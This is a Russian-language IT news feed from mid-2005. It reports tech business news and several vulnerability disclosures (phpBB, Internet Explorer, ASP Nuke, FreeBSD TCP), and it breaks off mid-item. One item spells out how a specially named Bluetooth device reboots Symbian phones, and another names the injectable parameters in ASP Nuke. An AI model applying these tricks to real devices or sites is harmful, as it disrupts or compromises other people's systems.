Длительная антимонопольная тяжба между Microsoft и федеральным правительством завершена. Как было объявлено, вчера, в результате урегулирования, разработчик программ из Редмонда согласился заплатить 775 миллионов долларов компании IBM. Кроме того, Microsoft обеспечит кредит в размере 75 миллионов долларов на использование программного обеспечения Microsoft в IBM. "Голубой гигант" была признан пострадавшим от монополистических действий Microsoft. Суд обнаружил, что действия Microsoft нанесли вред операционной системе IBM OS/2 и программным продуктам, входящим в комплект SmartSuite. "Компания IBM довольна, что мы дружески решили проблемы, стоявшие долгое время", — сказал Эд Линин (Ed Lineen), старший вице-президент и главный юрисконсульт IBM, в совместном заявлении компаний по итогам урегулирования. Ну что ж, IBM свою компенсацию за вынужденный уход с рынка операционных систем для персональных компьютеров получила. А как быть пользователям? Ведь во многих случаях реальной альтернативы продукции Microsoft нет, что бы там не говорили сторонники OpenSource…
Источник

3/07/2005 11:54 Новгородский областной суд приговорил интернет-мошенника к 3 годам лишения свободы
Новгородский областной суд отказался смягчить приговор жителю Новосибирска, обвиняемому в интернет-мошенничестве. Во вторник коллегия областного суда по уголовным делам рассмотрела кассационную жалобу по делу 38-летнего уроженца Новосибирска Михаила Кисилева. Рассмотрев кассацию, судебная коллегия пришла к выводу, что оснований для пересмотра вынесенного приговора нет и оставила его в силе. По данным Новгородского управления внутренних дел (УВД), в 2002-2004 годах Кисилев от имени вымышленных супружеских пар, якобы проживавших в Австрии, США и Франции, разместил на нескольких интернет-сайтах объявления о приеме на работу россиян на очень выгодных условиях. Для оформления приема на работу, на визы и страховки от каждого из потенциальных клиентов обвиняемый просил перечислить в адрес фирмы-провайдера от 3 до 5 тысяч рублей. Далее эти средства поступали в так называемый анонимный виртуальный кошелек. Жертвами деятельности Михаила Кисилева стали как минимум 22 россиянина. После задержания Кисилева весной 2004 года в Санкт-Петербурге было установлено, что с 1999 года он находился в федеральном розыске как скрывшийся из колонии-поселения, где он отбывал наказание за разбой. В феврале текущего года расследование дела было завершено. Суд приговорил Михаила Кисилева к 3 годам лишения свободы с отбыванием срока наказания в колонии строгого режима. Кроме этого, он обязал Кисилева выплатить пострадавшим от мошенничества материальный ущерб в размере около 80 тысяч рублей.
РИА "Новости"

3/07/2005 11:32 Ставим ПО в корпоративные сети
Компания Acronis объявила о выходе в свет Acronis Snap Deploy — комплексного решения, предназначенного для одновременного развертывания операционных систем на нескольких удаленных компьютерах из предварительно созданного эталонного образа, сообщает Internet.Ru. Основное назначение Acronis Snap Deploy — оперативное развертывание, настройка и конфигурирование программного обеспечения на компьютерах работающих в корпоративной сети. Сфера применения Acronis Snap Deploy — корпоративные сетевые среды. В полной мере ощутить эффект от использования Acronis Snap Deploy смогут специалисты тех организаций, где приходится единовременно вводить в строй не менее 10–20 компьютеров. Acronis Snap Deploy позволяет сократить время и трудозатраты, необходимые для установки ОС (с последующей настройкой сетевых параметров и учетных записей) и программного обеспечения. "Благодаря одновременному развертыванию образа установка операционных систем и программного обеспечения даже на десятках новых рабочих станций занимает буквально считанные минуты", - говорится в пресс-релизе.
Подробнее

3/07/2005 11:05 ПО распознавания русского текста на КПК
"Кварта Технологии" выпустила Pocket PC Recognizer Pack -- систему распознавания русского слитного рукописного ввода на устройствах, работающих под управлением MS Windows Mobile 2003 Second Edition для КПК и более поздних версий. Система построена на технологии распознавания рукописного текста riteScript компании EverNote. Основное назначение Pocket PC Recognizer Pack -- преобразование из графического вида в текстовый рукописных заметок, выполненных в различных приложениях, работающих на КПК, например, в Notes, Contacts, Calendar и Tasks, а также в режиме рукописного ввода программы Pocket Word. Наряду с этим, пакет добавляет поддержку распознавания русских рукописных слитных слов в программе ввода Microsoft Transcriber. Объем памяти, занимаемой ПО на устройстве-- около 5 Мб.
"Открытые системы"

3/07/2005 10:40 Microsoft открывает локальный поиск
Призывая разработчиков на помощь в борьбе с доминированием Google в сфере поиска, Microsoft опубликовала документацию по расширению своего инструментария локального поиска за пределы браузера. Опубликованные на этой неделе интерфейсы прикладных программ (API), которые пока находятся в стадии бета-тестирования, позволяют программистам отображать результаты локального поиска в собственных приложениях. Отделение Microsoft MSN выпустило Windows Desktop Search в мае, через несколько месяцев после того, как вышла аналогичная программа Google — Desktop. Windows Desktop Search уже содержит несколько функций для специализированного поиска, таких как возможность ускорять процесс поиска, создавая индексы. У Google тоже есть API и комплект разработчика ПО, которые позволяют сопрягать Google Desktop с разными приложениями. Microsoft несколько умерила свои амбиции в отношении поиска в Longhorn, следующей редакции Windows, которая должна выйти в будущем году. Но компания все еще намерена существенно расширить возможности поиска в Windows. Например, в Longhorn результаты поиска можно будет сохранять в качестве виртуальных папок, которые автоматически обновляются, вбирая в себя все объекты, отвечающие заданным условиям. Включив средства поиска в Longhorn, Microsoft планирует сделать соответствующие API доступными для разработчиков, создающих специальные приложения поиска. Между тем Apple Computer уже предлагает API, позволяющие программистам писать плагины для Spotlight, механизма поиска, встроенного в Mac OS X 10.4 Tiger.
ZDNet

2/07/2005 14:00 Выпущена Opera 8 для Windows Mobile 2003 Smartphone
Компания Opera Software выпустила версию своего браузера Opera 8 для операционной системы Windows Mobile 2003 Smartphone. По словам главы Opera Software, изначально компания не планировала создавать версию под платформу Windows Mobile, но пользователи настаивали, так как были не удовлетворены существующими браузерами. Две привью версии были выпущены осенью 2004 года. 120 тысяч пользователей скачали, тестировали и присылали свои отзывы об этих версиях. Компания подчёркивает, что Opera 8 для Windows Mobile обеспечивает большую скорость, более удобный интерфейс и лучше отображает контент, чем другие доступные в настоящее время альтернативы. Браузер поддерживает основные Web-стандарты, в том числе CSS2, DOM 2 и JavaScript. Opera 8 для Windows Mobile сделана на основе нового ядра Opera, кроме того, она поддерживает последнюю версию технологии Small-Screen Rendering, которая переформатирует текст и графику HTML-страницы в одну колонку, подгоняя её под ширину дисплея мобильного устройства.
Mobile-Review

2/07/2005 13:31 "Hello World" на различных языках программирования
Посетитель нашего форума с ником ~Jagular прислал ссылку на довольно любопытную подборку любимой начальной программы программистов "Hello World" на 190(!) языках программирования. Подобрал все эти фрагменты Wolfram Rösler из Германии. Есть фрагменты на довольно эказотических языках, таких, как ABAP4, например.
"Hello, World"

2/07/2005 12:51 В электронных открытках прячутся вирусы
Специалисты антивирусной компании Sophos обнаружили в Сети рассылку электронных открыток, содержащих ссылку на составной вредоносный код из вирусов и троянских модулей. Письмо содержит ссылку на страницу с открыткой. При просмотре этой страницы браузером без последних обновлений защиты, на компьютер посетителя незаметно загружается вредоносный код. В частности, машина заражается троянской программой-загрузчиком Clsldr-D и клавиатурным шпионом Divo-A, который ворует данные, вводимые при входе в онлайновые платежные системы. Старший консультант Sophos по технологиям Грэм Клули (Graham Cluley) считает, что опасность заражения «очень реальная», потому что люди думают, что письма приходят от старых друзей, и нажимают на ссылку из любопытства. Он советует пользователям удалять сомнительные открытки.
Источник

2/07/2005 12:29 Требование Novell прекратить процесс SCO против IBM суд не поддержал
Попытка Novell ослабить позиции SCO в споре этой компании с IBM и сообществом open-source в целом провалилась. Некоторое время назад компания Novell подала ходатайство о прекращении производства по делу об установлении принадлежности прав на ОС Unix. SCO Group, как известно, подала в суд на IBM, утверждая, что эта корпорация незаконно перенесла фрагменты исходного кода UNIX (проприетарной системы) в открытую ОС Linux. SCO утверждает, что Novell передала первой все права на UNIX, а следовательно, IBM напрямую нарушила права SCO. В прошлом году Novell и SCO заваливали друг друга исками: предметом спора стало наличие или отсутствие у Novell прав на UNIX. Компания Novell утверждала, что часть копирайтов она оставила у себя, SCO стояла на том, что Novell передала ей всё. И вот суд отклоняет очередной иск Novell, в котором компания потребовала прекратить рассмотрение дела относительно того, принадлежат ли SCO права на UNIX, или нет. Федеральный окружной судья Дейл Кимболл (штат Юта) постановил, что претензии Novell на обладание правами требует изучения информации, не относящейся напрямую к двум контрактам, в рамках которых часть активов UNIX перешли от Novell к предшественнику SCO Group.
Подробности

2/07/2005 11:46 Microsoft может начать лицензирование ПО Xbox сторонним компаниям
Вполне возможно, корпорация Microsoft в ближайшее время начнет лицензирование программного обеспечения, использующегося в игровой приставке Xbox, сторонним компаниям. Об этом сообщает Nihon Keizai Shimbun со ссылкой на заявления основателя Microsoft Билла Гейтса. Предполагается, что возможность использования ПО Xbox сторонними производителями компьютерного оборудования и бытовой электроники позволит софтверному гиганту увеличить свою долю на рынке игровых приставок. В настоящее время в данном сегменте лидирует японская корпорация Sony со своей приставкой PlayStation 2, на долю которой приходится свыше 50 процентов рынка. Оставшуюся часть делят между собой Microsoft и Nintendo. Впрочем, пока о планах Microsoft в отношении лицензирования программного обеспечения Xbox практически ничего не известно. Билл Гейтс отказался уточнить, о какой версии ПО (для Xbox или Xbox 360) идет речь, каким компаниям будет предоставлена возможность использовать разработки софтверного гиганта и можно ли будет применять данную программную платформу в продуктах, отличных от игровых приставок. Продажи новой версии Xbox должны начаться до конца нынешнего года. Sony планирует вывести на рынок PlayStation 3 весной 2006 года. При этом производительность игровой приставки PlayStation 3 будет вдвое превышать показатели быстродействия Xbox 360, однако и стоить устройство Sony будет дороже. Кстати, аналитики японской фирмы Merrill Lynch Japan Securities прогнозируют, что в течение первого года продаж PlayStation 3 корпорация Sony потеряет миллиард долларов из-за того, что себестоимость устройств составит примерно 500 долларов, а приобрести их можно будет по цене в 400 долларов США.
Источник

2/07/2005 11:22 Уязвимость в FreeBSD
Командой разработчиков проекта FreBSD выпущен бюллетень FreeBSD-SA-05:15.tcp, в котором описываются уязвимости в реализации TCP/IP стека в этой популярной ОС. Уязвимость в опции PAWS Timestamp позволяет удаленному пользователю послать большое количество специально сформированных пакетов с большим значением таймера, что заставит систему воспринимать все последующие пакеты как старые и отвергать их. Удаленный пользователь может разорвать все текущие TCP соединения. Также удаленный пользователь может послать специально сформированный TCP пакет с флагом SYN и перезаписать определенные TCP опции. Все эти уязвимости могут позволить удалённому атакующему вызвать DoS сервера (рабочей станции). Выпущены патчи как для ветви STABLE (4, 5 версия), так и для ветви RELENG.
Бюллетень

2/07/2005 11:06 Стандартизация антиспамерской технологии: процесс пошёл
Организация по стандартизации интернет-технологий утвердила два «экспериментальных» проекта стандартов по борьбе со спамом, невзирая на противоречия, разделяющие Microsoft и ее конкурентов по системам e-mail. Организация Internet Engineering Steering Group (IESG), подразделение Internet Engineering Task Force (IETF), намерена опубликовать два конкурирующих и пересекающихся набора документов, определяющих способы подтверждения того, что отправитель сообщений e-mail — действительно тот, за кого себя выдает. Экспериментальные «Рабочие предложения» (RFC) — Sender Policy Framework (SPF) for Authorizing Use of Domains in E-Mail и Sender ID: Authenticating E-Mail — стали предметом интенсивных споров между Microsoft, America Online и другими. Критики обвиняют Microsoft в попытке принудить отрасль к принятию стандарта Sender ID. Некоторых участников процесса стандартизации настораживает наличие у Microsoft патентов, относящихся к технологии Sender ID, и в прошлом году IETF распустила рабочую группу по Sender ID. «Рассматривались многие предложения по авторизации на базе доменов, но консенсус по выработке единого технического подхода пока не достигнут, — говорится в заявлении IESG. — IESG не одобряет ни один из двух механизмов, изложенных в экспериментальных RFC — их публикация нацелена на поощрение дальнейших дискуссий и экспериментирования с целью накопления опыта, который можно будет использовать для создания будущих стандартов в этой области». В число других применяемых антиспамерских технологий аутентификации входит Yahoo DomainKeys, которую недавно пообещала поддержать Cisco. IESG говорит, что хотя поставщики услуг электронной почты уже внедрили Sender ID и SPF, экспериментальный период служит ключом к процессу стандартизации. «Учитывая важность всемирных систем e-mail и DNS (Domain Name System), жизненно необходимо, чтобы будущие стандарты способствовали их постоянной стабильности и гладкой работе», — пишет IESG.
ZDNet

2/07/2005 10:03 США никому не отдадут контроль над Интернетом
Представитель министерства торговли США Майкл Галахер (Michael Gallagher) объявил, что его страна не намерена передавать контроль над корневыми DNS-серверами, которые обеспечивают базовую функциональность современного Интернета, какой-либо международной структуре, сообщает BBC News. Это заявление стало ответом на звучащие на разных уровнях предложения передать соответствующие полномочия международным представителям, например, под эгидой ООН. Сейчас распределением доменов верхнего уровня и поддержкой функциональности всей доменной системы занимается корпорация ICANN, которая также состоит из международных представителей, но министерство торговли США обладает правом вето на ее действия. Полномочия были переданы ICANN в 1998 году, до этого министерство само управляло корневыми DNS-серверами, которые расположены, главным образом, в нескольких вузах и государственных агентствах в разных местах на территории США. К министерству, в свою очередь, полномочия перешли от Пентагона, в ведении которого находилась разработка интернет-технологий на начальном этапе развития глобальной сети. По словам Галлахера, Интернет сегодня выполняет важнейшую экономическую функцию, в том числе для экономики США, и власти страны считают, что для базовых структур Сети необходимо обеспечивать стабильную поддержку, чтобы гарантировать их нормальную работу. Американское правительство уверено в своей способности делать все необходимое, чтобы справляться с этой задачей и не намерено передавать контроль за корневыми DNS-серверами кому-либо. Следует отметить, что система DNS является "надстройкой" над непосредственным механизмом функционирования Интернета - TCP/IP-протоколом, который позволяет организовывать единые компьютерные сети из многих независимых, а равно делить их "обратно". В случае прекращения работы корневых DNS-серверов перестанет нормально действовать система доменных имен, что вызовет множество сбоев различного рода, но компьютеры в Интернете все равно смогут "находить" друг друга по цифровым IP-адресам, кроме того, система DNS предусматривает многоуровневое резервирование. Роль "контролирующего центра Интернета" заключается прежде всего в координировании процессов сетевого строительства.
Подробности

30/06/2005 13:10 Архитектуру интернета хотят переделать
Дэвид Кларк, чьи работы в 70-е привели к появлению Сети, сейчас возглавит работу по определению принципиально новой архитектуры для следующего поколения интернета. Многие считают, что и современный интернет нормально справляется со своими задачами, а скоростная сеть Internet2 должна быть создана на его основе. Однако д-р Дэвид Кларк с этим не согласен. Он говорит, что проблемы будут неизбежно накапливаться со временем, ибо архитектура сети, созданная 30 лет назад, имеет «фундаментальные проблемы дизайна». Даже если увеличить скорости в десять раз, это не поможет. Нужно создавать новую архитектуру с нуля. Как пишет журнал Wired, Национальное научное общество США выдало Дэвиду Кларку грант в размере $200 тыс. на проведение уникального эксперимента по практическому испытанию самых необычных идей относительно принципиально новой архитектуры будущего интернета. Планируется, что в рамках эксперимента осенью текущего года Национальное научное общество объявит о начале конкурса на разработку архитектуры Internet2. Исследователи смогут выслать свои предложения. Опытные «образцы дизайна» будут испытаны в национальной оптоволоконной сети LambdaRail, которую ученые интенсивно используют именно в экспериментальных целях — для обкатки новых сетевых технологий и приложений. Руководить экспериментом будет лично Дэвид Кларк. Проблема сегодняшнего интернета в том, что его дизайн создавался 30 лет назад. Именно такой дизайн был необходим для тех приложений: WWW, электронная коммерция, файлообмен и т.д. Новая же архитектура должна объединить не только компьютеры, но и миллионы беспроводных устройств и миллиарды сенсоров. Новый интернет должен обеспечить более безопасные и удобные формы электронной коммерции. Скорости должны быть такими высокими, чтобы люди могли свободно перемещаться в трехмерном интерфейсе. Естественно, будут созданы новые приложения и новые протоколы. По мнению Кларка, архитектуру Internet2 нужно изначально тщательно продумать и создать ее с нуля, чтобы она была гарантированно жизнеспособна для завтрашних приложений. Дэвид Кларк говорит, что полученный грант он использует для организации этим летом встречи со специалистами, которые потенциально могут предложить свежие идеи. Недоброжелатели считают, что налогоплательщики впустую потратили $200 тыс., а Национальное научное общество США воздерживается от комментариев.
"Вебпланета"

30/06/2005 12:43 Эксплоит уязвимости phpBB
Как мы сообщали вчера, обнаружена уязвимость в популярном ПО phpBB. Digital Security Research (!dSR) выпущен эксплоит для этой уязвимости. Написан на Перл.
Эксплоит

30/06/2005 12:32 Уязвимость в Internet Explorer
Как сообщил Martin Eiszner из SEC-CONSULT, обнаружена уязвимость в популярном браузере Internet Explorer. Она связана с возможностью переполнение кучи (heap) при использовании библиотеки javaprxy.dll в случае обработки исключений в COM-объектах. Для проведения атаки злоумышленник должен сформировать специальную HTML-страницу, которая может вызвать аварийное завершение работы браузера, а также выполнить произвольный код на компьютере жертвы. Уязвимость проверена в версии IE 6.0.2900.2180. Автором приведён пример CGI-скрипта на Перле, который демонстрирует уязвимость. Как написано в конце сообщения, Microsoft ответила, что не смогла вопроизвести уязвимость, однако, вопрос об обработке COM-объектов будет проработан.
Описание

30/06/2005 11:49 Microsoft произвела последнюю ревизию Windows 2000
За два дня до окончания срока основной поддержки ОС Windows2000, Microsoft сделала "прощальный подарок" пользователям этой ОС, выпустив ожидаемый пакет Service Pack 4 Update Rollup, который содержит базу всех обновлений безопасности, со времени выхода SP4. Кроме того в нем содержатся некоторые заплатки, не связанные с безопасностью. Первоначально этот пакет был анонсирован в ноябре прошлого года, а в стадию бета-тестирования вступил в январе текущего. По плану разработчиков, релиз Update Rollup был намечен на апрель, однако задержался. Большинство патчей, вошедших в этот пакет, уже были доступны как самостоятельные обновления. Таким образом, это последний официальный набор исправлений для Windows200, так как срок ее поддержки заканчивается 1 июля 2005, поэтому увидеть Windows2000 Service Pack5 уже не суждено.
Подробности

30/06/2005 11:20 Автор программы для взлома защиты DVD вновь отличился
Йон Лех Йохансен, автор программы DeCSS для обхода защиты от копирования DVD-дисков, выложил на своем веб-сайте "патч", посредством которого можно снять ограничения с недавно выпущенной компанией Google бесплатной утилиты Video Viewer. Программа Google Video Viewer предназначена для просмотра видеороликов, распространяющихся через службу Google Video. Как сообщает PC World, медиаплеер Google представляет собой модифицированную версию программы с открытым исходным кодом VLC (VideoLAN Client). Приложение Google Video Viewer, в том виде, в котором его распространяет Google, воспроизводит только файлы собственно формата. Однако после инсталляции "заплатки" Йохансена, данное ограничение снимается. Представители Google подчеркнули, что не рекомендуют пользователям устанавливать самодельный апдейт, поскольку в этом случае не гарантируется безопасность и дальнейшая совместимость с сервисом Google Video. Йон Лех Йохансен, также известный как DVD Йон, написал DeCSS в возрасте 15 лет. Сразу после этого на молодого программиста ополчилась американская киноиндустрия, и Йохансену пришлось предстать перед судом. Впрочем, в январе 2003 года норвежский суд вынес в отношении DVD Йона оправдательный приговор. Впоследствии Йон Лех Йохансен вновь попал в центр внимания прессы, выпустив программу для обхода системы защиты от несанкционированного копирования музыкальных файлов из онлайнового магазина Apple iTunes Music Store. Теперь взломщик обратил внимание на ПО Google.
Сайт Йона

30/06/2005 10:26 Новая система для управления пропускной способностью для Linux
Группа японских ученых представила первую версию пакета PSPacer, распространяемого в рамках лицензии GPL и предназначенного для точного и аккуратного лимитирования трафика, исключающего потерю пакетов, сообщает Opennet.ru. В состав PSPacer входит модуль для Linux ядер 2.4/2.6, и библиотека для управления через стандартный интерфейс iproute2 ("tc qdisc", Linux Queueing Discipline (Qdisc)).
Подробнее

30/06/2005 10:04 Java реального времени от Sun, наконец, готова
Sun Microsystems выпустила версию Java «реального времени», предназначенную для устройств, которые должны реагировать на высокоприоритетные события. Sun Java Real-Time System исполняет все программы, написанные для Java Standard Edition, но содержит также дополнения, гарантирующие способность ПО реагировать на критические события в течение заданного интервала времени. Такая поддержка реального времени имеет важное значение для промышленных роботов и других устройств, снабженных кнопкой аварийного останова. Sun продемонстрировала ПО с кодовым названием Project Mackinaw на прошлогодней конференции JavaOne и теперь официально представила его на той же конференции в Сан-Франциско. Расширения Java реального времени стали одними из первых продуктов программы Java Community Process, по которой Sun позволяла другим компаниям принимать участие в разработке Java. Поначалу программа шла тяжело. В 1999 году несколько фирм, недовольных правилами Sun в отношении Java — включая Hewlett-Packard, Microsoft и небольшую компанию NewMonics — начали разработку собственного стандарта Java реального времени под эгидой организации, называемой J Consortium. Работа над Java реального времени стала первым проектом Java Specification Request (JSR) в рамках Java Community Process. Работа началась в 1998 году, а первая версия спецификации вышла в 2000 году.
ZDNet

30/06/2005 09:41 Британские власти посадили в тюрьму помощников русских хакеров
Проживающий в Великобритании гражданин США Дуглас Гэвард (Douglas Havard) был приговорен к 6 годам тюремного заключения за мошенничество в сфере высоких технологий. Как сообщает BBC News, он принимал участие в деятельности глобальной хакерской группировки и подделывал банковские карты. Как установило следствие, он похитил безналичные денежные средства на общую сумму 6,5 миллионов британских фунтов. Кроме того, был также осужден его подельник Ли Элвуд (Lee Elwood) из британского города Лидс. Против него были выдвинуты аналогичные обвинения, он признал себя виновным и получил 4 года тюрьмы. Хакеры были задержаны в рамках совместной антихакерской операции спецслужб Великобритании и США, которые работают над пресечением деятельности организованной группы интернет-мошенников из Восточной Европы и России, которые занимаются хищениями средств со счетов британских и американских граждан. Гэвард и Элвуд были британскими "агентами" этой группировки.
Источник

29/06/2005 14:53 Уязвимость во многих браузерах семейства Mozilla
Paul Kurczaba сообщает об уязвимости в семействе Mozilla-ориентированных браузеров. Сформировав специальную JavaScript-функцию, атакующий может вызвать отказ браузера. Автором выпущены 2 варианта подобной атаки - один предполагает участие пользователя, второй не требует участия. Уязвимости подвержены: Mozilla 1.7.8, Firefox 1.0.4, Camino 0.8.4. В качестве меры противодействия рекомендуется убрать разрешение на запуск JavaScript.
Подробности

29/06/2005 14:19 Уязвимость в phpBB
В Full-Disclosure сообщается об обнаружении уязвимости в популярном ПО для организации форумов phpBB. уязвимость обнаружена в коде "highlighting" в функции preg_replace() файла viewtopic.php. Существование уязвимости позволяет внедрить произвольный PHP-код в запущеннный скрипт, что может позволить выполнить системные команды, если PHP-интерпретатор поддерживает функцию system() и ей подобные. Уязвимость обнаружена в версии 2.0.15 и ниже. Рекомендуется обновиться до версии 2.0.16 или внести исправление в файл viewtopic.php.
Подробное описание

29/06/2005 13:54 Новая версия антивируса InterScan Web Security Suite блокирует spyware
Компания Trend Micro, поставщик ПО и услуг в области антивирусной защиты сетей и интернет-контента, объявила о выходе новой версии антивируса Trend Micro InterScan Web Security Suite 2.5. Решение блокирует шпионские программы, а также защищает от вирусов, фишинговых атак и других вредоносных программ, попадающих в корпоративные сети через интернет-шлюз. InterScan Web Security Suite 2.5 - масштабируемая и полнофункциональная программа - защищает корпоративные сети на протяжении всего их жизненного цикла от вирусных эпидемий и вредоносных атак, а также позволяет ИТ-администраторам гибко и точно управлять политиками защиты в рамках всего предприятия. Последняя версия продукта содержит новые технологии борьбы со шпионскими программами. Помимо блокирования проникновения шпионских программ в сеть через шлюз, InterScan Web Security Suite может инициировать очистку зараженных клиентов для удаления находящегося на них шпионского ПО. Процесс осуществляется с помощью опциональных служб Damage Cleanup Services, которые помогают автоматизировать процесс очистки и восстановления любого зараженного сервера и клиентского ПК, вне зависимости от наличия на нем установленного антивирусного ПО. InterScan Web Security Suite блокирует исходящие сообщения "на домашний телефон", что позволяет защитить ничего не подозревающих пользователей от фишинговых атак. Этот продукт также обеспечивает защиту от шпионских программ, которые собирают информацию о зараженных системах и отправляют ее злоумышленникам.
Подробности

29/06/2005 11:43 В популярном ASP-портале найдены уязвимости
Обнаружены множественные уязвимости в ASP Nuke, которые позволяют удаленному пользователю произвести XSS-нападение, атаку HTTP Response Splitting и выполнить произвольные SQL-команды в базе данных приложения. Межсайтовый скриптинг возможен из-за недостаточной обработки параметра email в сценарии forgot_password.asp и в нескольких параметрах сценария register.asp. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML-сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Атака HTTP Response Splitting возможна из-за недостаточной обработки параметра LangCode в сценарии language_select.asp. Удаленный пользователь может с помощью специально сформированного запроса подменить содержимое страниц сайта и «отравить» кэш промежуточных прокси-серверов. SQL-инъекция возможна из-за недостаточной обработки входных данных в параметре TaskID сценария comment_post.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL-команды в базе данных приложения. Уязвима программа ASP Nuke 0.80 и более ранние версии. Для использования «дыр» есть эксплойт.
Источник

29/06/2005 11:20 Microsoft не защитит пользователей IE
Корпорация Microsoft не планирует выпускать заплатку, устраняющую одну из уязвимостей в Internet Explorer. Специалисты считают, что это решение может дорого стоить пользователям браузера. Microsoft не планирует выпускать обновление для Internet Explorer, которое защитит пользователей от так называемых спуфинговых атак. Имеются в виду ситуации, когда человеку вместо ссылки на настоящий сайт подсовывают адрес аналогичного по дизайну портала, который принадлежит мошенникам. Подмена происходит обычно на какой-нибудь известной веб-странице. На ней появляется рекламный баннер со ссылкой на сайт мошенников, где пользователю настоятельно рекомендуют сообщить личную информацию под каким-либо невинным предлогом. Происходит это во многом из-за того, что диалоговые окна JavaScript не показывают их происхождение. И именно эту проблему не собирается решать Microsoft, несмотря на то что эксперты называют возможность проведения спуфинговых атак заметным недостатком Internet Explorer. Такое заключение связано с тем, что подобного рода атаки стали хорошим подспорьем для злоумышленников, промышляющих фишингом.
Источник

29/06/2005 10:48 AMD требует суда над Intel
В иске AMD говорится, что практика скидок и субсидий Intel в сочетании с карами для тех производителей ПК, которые покупают слишком много процессоров AMD, наносит ущерб конкуренции и сдерживает прогресс. AMD подала иск в окружной суд Делавэра против Intel, обвиняя конкурента в принуждении крупных заказчиков к заключению эксклюзивных сделок и лишении их скидок и маркетинговых субсидий за приобретение большего, чем оговоренное с Intel, количества процессоров AMD. Компания утверждает также, что Intel угрожает карами тем заказчикам, которые ведут бизнес с AMD, установила квоты, препятствующие продаже тех компьютеров, какие они хотят, и вынуждает производителей ПК бойкотировать семейства продуктов AMD. В заявлении на 48 страницах, составленном в гневном тоне, AMD описывает свои усилия — большинство из которых, как она утверждает, оказались напрасными — по убеждению крупных производителей оригинального оборудования использовать процессоры компании. Например, когда AMD предложила НР, крупнейшему в мире производителю компьютеров, миллион процессоров бесплатно, НР согласилась взять только 160 тыс. Генеральный директор AMD Гектор Руиз комментирует иск в открытом письме, где говорит: «Наш конкурент причиняет ущерб и ограничивает конкуренцию в индустрии микропроцессоров. Мы вынуждены принять меры от своего имени и от имени наших заказчиков и партнеров во всем мире». В большинстве случаев это просто бизнес, «но в случае монополиста это незаконно», пишет Руиз.
Открытое письмо AMD

29/06/2005 10:17 Intel Celeron становится 64-разрядным
В понедельник Intel выпустила 64-разрядный процессор для массовых ПК, на месяц опередив конкурирующую фирму AMD, которая планирует предложить аналогичный чип в июле. Новый Intel Celeron D 351 почти идентичен Celeron D S775, за исключением того, что в него добавлена 64-разрядная технология EM64T. AMD в середине июля тоже планирует выпустить 64-разрядный чип для массовых ПК — Sempron, а IBM с июня 2003 года снабжает Apple Computer 64-разрядным процессором PowerPC 970, или G5. Новый Celeron с тактовой частотой 3,20 ГГц содержит кэш-память емкостью 256 Кбайт, 533-МГц системную шину и дополнительную аппаратную поддержку Microsoft Windows Service Pack 2. Intel утверждает, что этот чип позволит более эффективно работать с Web, e-mail и документами, вести семейную бухгалтерию и играть в компьютерные игры. Вдобавок к новому Celeron компания выпустила два сопутствующих чипсета, которые поддерживают видеоизображение высокой четкости, аудио 7.1 surround sound и обеспечивают расширенные возможности по обработке графических данных. Кроме Celeron 351, Intel анонсировала Celeron 350. Этот процессор тоже работает с тактовой частотой 3,2 ГГц, но не поддерживает EM64T. Оба процессора продаются по ценам от $73 до $127 при поставках партиями по 1000 штук. Выпуск Celeron D 351 означает окончательный переход Intel на 64-разрядные процессоры для настольных ПК. В начале года Intel выпустила процессор Pentium Extreme Edition с технологией EM64T.
Источник

29/06/2005 09:58 Sun Microsystems делает бесплатной технологию Java
Компания Sun Microsystems, отмечающая десятилетие популярной технологии разработки компьютерных приложений Java, сообщила, что отныне эта технология будет базироваться на принципах "открытого ПО" и распространяться свободно, сообщает интернет-издание eWEEK. На праздновании десятилетия президент Sun Джонатан Шварц (Jonathan Schwartz) объявил, что первым "раскрываемым" компонентом станет серверная часть корпоративной версии Java (EE). Впоследствии, по его словам, на открытую модель будут переводиться и другие компоненты. Как ранее сообщалось, с прошлого года Sun приняла решение изменить бизнес-модель и сделала открытой свой основной программный продукт - операционную систему Solaris, 10 версия которой распространяется бесплатно и представлена в версиях для разных компьютерных платформ. Также во вторник стало известно о том, что Sun намеревается приобрести за 387 миллионов долларов наличными компанию SeeBeyond Technology, производящую решения для объединения разрозненных компьютерных систем.
Подробности

29/06/2005 09:24 Энциклопедия создания сайтов v.1.0
Как сообщил нам один из посетителей, им создана "Энциклопедия создания сайтов v.1.0", в которой рассмотривается работа с визуальными HTML -редакторами DreamWeaver и MS FrontPage. Эти програмные продукты расчитаны на тех, кто плохо, или почти не знает язык HTML, хотя в них можно создавать сайты, даже не обладая данными знаниями. Также рассмотриваются HTML, PHP, Java, Perl так как без них необходитса не одна страница. Файл энциклопедии занимает объём 8.5 мегабайт. Желающие могут скачать и ознакомиться.
Сайт проекта

29/06/2005 09:01 Телефоны на платформе Symbian можно удаленно перезагрузить через Bluetooth
Как сообщает в списке рассылки seclists один из пользователей, им обнаружена возможность перезагрузки сотовых телефонов на платформе Symbian при использовании Bluetooth. Для того, чтобы это осуществить, необходимо Если сформировать имя своего устройства в виде: [текст][09 0a in hex][текст] (то есть, в имени устройства должен присутствовать код 09 0a в 16-ричном коде), то при поиске Bluetooth-устройств с телефона, если устройство с плохим именем будет найдено, произойдет рестарт телефона. Изначально сообщалось о подобном "поведении" телефонов Nokia, однако позже информация была дополнена сообщением о такой же особенности в Siemens 60-й серии с прошивкой Siemens SX1. Автором выпущен скрипт на Перле, который формирует указанный ник сотового телефона.
Описание

27/06/2005 16:55 В популярном менеджере закачки найдена уязвимость
Обнаружена уязвимость в программе увеличения скорости закачки Internet Download Manager версии 4.05. Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Удаленный пользователь может создать специально сформированный URL, длиной более 2080 байт, который вызовет переполнение стека и перезапишет SEH-регистр. Злоумышленник сможет выполнить произвольный код на целевой системе с привилегиями пользователя, запустившего Internet Download Manager. Уязвимости присвоен рейтинг опасности «высокая». Для использования «дыры» есть эксплойт. В настоящее время способов устранения уязвимости не существует, сообщил Securitylab.
Источник

27/06/2005 16:44 Bluetooth SIG отвечает на сообщения об уязвимости
Bluetooth Special Interest Group (SIG) сформулировала ответ двум израильским специалистам, обнаружившим потенциальную уязвимость защищенного соединения, в результате которой злоумышленник может получить доступ к аппарату жертвы. SIG проанализировала выводы криптографов и отметила, что деструктивные действия действительно могут быть совершены. Однако при использовании довольно дорогостоящего оборудования. В любом случае, чтобы обезопасить пользователей от вторжения извне, SIG сформулировала три новых правила безопасного соединения:
